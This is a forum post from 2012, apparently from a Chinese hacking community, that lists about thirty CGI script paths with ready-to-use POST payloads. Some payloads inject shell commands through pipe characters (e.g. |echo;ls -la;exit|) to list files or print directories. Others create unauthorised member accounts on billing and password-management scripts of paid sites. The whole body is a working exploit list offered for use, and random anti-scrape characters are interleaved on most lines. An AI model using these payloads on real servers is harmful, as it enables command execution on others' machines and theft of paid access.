找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2454|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================% B# R$ v! S$ P* S% r( q( X
. i) ^+ h3 s; R  l& H
/smspass.pl
# p! [. W9 U4 ]+ i' O/ m. Eusername=username&password=password
( m; ?8 Y) w6 a5 c7 s/ \6 {9 d6 a6 q/ P  J
/index.cgi
( s2 [7 |# |: j8 a# a9 @wei=ren&gen=command! @$ c3 U8 p) f2 t9 ^
& ~; }# N: k3 F7 N: b3 U2 O4 m
/passmaster.cgi
1 u' f( u! ]4 `9 ]Action=Add&Username=Username&Password=Password
( ?0 C7 [/ S; u) y/ R! f% j- y
1 F% _4 Y, R6 w& Z/accountcreate.cgi
- T2 B+ H! L" R2 o4 u. _/ susername=username&password=password&ref1=|echo;ls|' O& V, r0 |8 G3 n
- k. s& [3 ], s1 n
/form.cgi5 h7 U6 v) I& r3 i, e; U- U
name=xxxx&email=email&subject=xxxx&response=|echo;ls|0 b# w) j! j2 E$ L

7 L8 o: o; P( Q3 r/addusr.pl
6 o% L) i9 ~  c' s& D/cgi-bin/EuroDebit/addusr.pl- V/ G0 _, \, [5 `1 g6 f
user=username&pass=Password&confirm=Password
, q% F/ A( r5 N! d. H9 r
% l) i' ]! y' g* A/ccbill-local.asp
0 j! P% Y2 H2 ]6 V; T  x* ]post_values=username:password
6 D: N, G8 s9 F" n* ^/ k& M. t
/ M5 r$ O$ Q) k/count.cgi
9 B5 N$ E0 p; N) F  r4 npinfile=|echo;ls -la;exit|* f( V. q. p& l/ Q. R% Q) t8 m

0 C2 {1 T  a( V* u  R! P/recon.cgi
" e; E3 ]3 ^. y- n/ o# Z/recon.cgi?search  v( L! C/ V: N6 Y/ R
searchoption=1&searchfor=|echo;ls -al;exit|/ c" e0 N& o6 ~- _( Z
9 ^% \& Y" M% z# h6 _" s$ y: b1 y
/verotelrum.pl# f( J8 U4 {6 g3 p
vercode=username:password:dseegsow:add:amount<&30>
  y$ Q& d" H8 O! p7 `2 S& x# U! k
% \- @2 f5 {$ D0 i7 a; I0 q/af.cgi7 ^, o1 z( ~' h
_browser_out=|echo;ls -la;exit;|) n* f0 ]% \5 i. x
& b; w& T4 p; }: h7 ?$ y
/modify.cgi! [2 f" K5 E( d- x+ G  D7 F3 O
username=username&password=password&expire=30/ y9 b+ d3 h# ?  c6 j

" Y2 ~) v: R* M& h) P3 `8 K/openjournal.cgi* O# d) i! O+ B7 o3 O7 [
edit=1&ct=2&go=|echo;ls -al;exit|& ?0 e! ^6 I3 `" ^% O9 G

- H' d8 u. Y" P1 `! \5 Q/gx9passwd.cgi
) C/ x& ?: }1 v5 F$ ecmd=ADD&user=username&pass=password
* g) M1 Z9 A' X- ^% G! n
( Z- j, p: z: F) V' w/ }4 Z( q/probecontrol.cgi1 }* a, u& j) E& R& S  N
command=enable&username=username&password=password1 _& w% d& B6 d) j& }; o
  i* ^' y3 B# Q
/recon.cgi
) I0 X. N. \: ksearchoption=3&searchfor=echo;ls -la;exit, {3 U( h4 s# P6 p, Y( w

+ W) i2 ]: U; p) d$ p7 p/htadd.pl- K! Z) X6 I% L4 L, ]" n
configfile=|echo; ls -alt; exit* Y  K# }* ]0 s9 ]

' w3 S3 p$ P' R2 d/gx9passwd.cgi
) {# k0 p) U: S4 L) P8 n4 {: ?cmd=ADD&user=username&pass=password- p. q. F/ r8 U( }, G% y
1 W. }" r8 l+ ~5 n) o1 z) Q
/ibill*.pl
" j2 [5 K! h& zreqtype=add&authpwd=authpwd&username=username&password=password
- |& G: H5 a7 U' o$ {/ C8 l
6 B1 [/ s. H: l- l/cpay.cgi
9 Q' t% g6 d7 K& Vcommand=add_member&username=username(EMAIL)&password=password(DES)
& ^. f0 q) o* u$ ~) z6 `' j3 f2 X3 V4 d4 S- K6 |1 H
/globill_ut.cgi
3 r6 ?+ J. K( i7 n0 qdo=add&username=username&password=password&wpassword=password  P7 r) u, N1 Z5 T, q
7 k, V3 Y0 x' i& ?
/usercontrol.cgi2 P9 v% q2 B/ C5 ?
command=enable&username=USER&password=PASS; A+ g9 k, B# B8 S8 C4 T+ H/ U
$ O6 l& D. Q, D
/globoSALErum.cgi, p  _' p; q1 z8 e2 B4 q( o
action=ADD&seccode=seccode&login=username&password=password
8 E8 y) r9 N5 D, r/ L1 o+ d- |; I3 D. @, g( {
/addusr.pl
1 H( p# e% I% m7 b: e* Y# p9 vuser=USER&pass=PASS&confirm=PASS8 W% @6 l. H. l; e: O0 @

3 r8 ]- N* v, }3 L/pincount.cgi
. ]6 }5 C, a, g8 y# h- z/cgi-bin/mastergate/pincount.cgi8 S& O& ^$ m. Z! T4 c/ C
pinfile=|echo;pwd;exit|
. k, B: E! _8 t6 q6 d9 V+ I: z
( B& t% S/ O1 b' Q  s/accountcreate.cgi" V5 p$ U6 P) ~
/cgi-bin/gateway/accountcreate.cgi
, l/ ^# m' H5 N) z$ Q3 ^8 \+ Rusername=username&password=password&password2=password&ref1=|echo;ls -al;exit
2 G" b- [- D9 g3 Q* v3 E
, A  u& M7 _/ o' u, @/af.cgi6 s6 Z- F9 ~8 l- n0 {, H
/env.cgi- ^; J1 E$ M& |6 |5 k
ADD+;echo;pwd;exit, x8 e$ \& s  }5 ]

  E; x# \$ j! k% U$ o% l  f+ w# @/count.cgi  Y5 _" s6 `) V2 M: F7 {  ?
pinfile=|echo;pwd;exit|
$ t; k: ~4 e& F) x% N. J
) y  Y5 `0 X9 @/recon.cgi
& q; [. j& `* tsearchoption=1&searchfor=|echo;ls%20-al;exit|( R7 Z/ Q& Q' ]  Q8 c+ r

5 y; y: g  Y, ^- Q" P* M9 Q/add.cgi. L# T7 s& \0 X/ W' ^% y  [% |
username=username&password=password&expire=30
# u0 x) z5 t" U2 E5 M2 x8 v; w2 o; q& _0 p9 R
==============================. ?: M7 P1 Y: C" v
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表